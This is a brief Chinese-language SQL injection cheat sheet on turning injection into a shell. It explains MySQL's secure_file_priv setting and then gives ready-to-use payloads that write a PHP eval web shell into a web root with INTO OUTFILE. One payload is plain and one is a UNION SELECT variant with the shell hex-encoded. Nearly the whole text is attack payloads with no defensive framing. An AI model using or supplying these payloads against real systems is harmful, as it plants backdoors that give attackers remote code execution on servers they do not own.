sql注入
目录
getshell
into outfile
show global variables like '%secure%';
secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
select '\<?php eval(\$_POST[yyj]);?>' into outfile "C/phpstudy/www/shell.php";
into outfile(hex)
union select 1,0x3c3f706870206576616c28245f524551554553545b315d293b3f3e,3 into outfile 'C:\xxxxxx\phpStudy\WWW\outfile.php'
其中0x3c3f706870206576616c28245f524551554553545b315d293b3f3e是\<?php eval(\$_REQUEST[123]);?> 的hex编码